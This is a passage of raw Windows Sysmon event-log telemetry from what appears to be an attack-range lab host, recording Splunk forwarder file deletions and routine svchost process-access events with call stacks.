Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8B44C64FE89DF91EB2B66F34A681513,SHA256=D5BBE81BAA823D4AF3E62774252473134278C066BCB84D7C1639BF83382494C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000046056Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.636{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DBB53A57B6A548AB4807A7AE6A1DFDF9,SHA256=EE3C1440E2A478D331E92E204DCC963E7FED20430C31FF2135479ED5B0A8F34E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000046055Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.486{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BB5A81B039D0F23DC10492DBAF1CBF2,SHA256=7CBCFC27A72539D43DA6ED094CB0C76462745182D0618D7D194B50383232847A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000046054Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046053Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046052Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046051Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046050Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046049Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046048Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046047Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE08-63C7-EF04-00000000AF02}6056C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046046Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046045Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046044Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046043Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046042Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046041Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046040Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046039Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046038Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046037Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046036Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046035Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046034Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046033Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046032Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046031Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046030Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+3a866|c:\windows\system32\rpcss.dll+3976a|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046029Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046028Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046027Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000046026Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:28:35.205{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892912C:\Windows\system32\svchost.exe{FE4C2B44-DE09-63C7-F204-00000000AF02}5228C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|c:\windows\system32\rpcss.dll+2d24d|c:\windows\system32\rpcss.dll+39644|c:\windows\system32\rpcss.dll+2b25e|c:\windows\system32\rpcss.dll+2a1f3|c:\windows\system32\rpcss.dll+45300|c:\windows\system32\rpcss.dll+456f2|c:\windows\system32\rpcss.dll+47fff|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x800000000000000018347Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:28:36.920{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 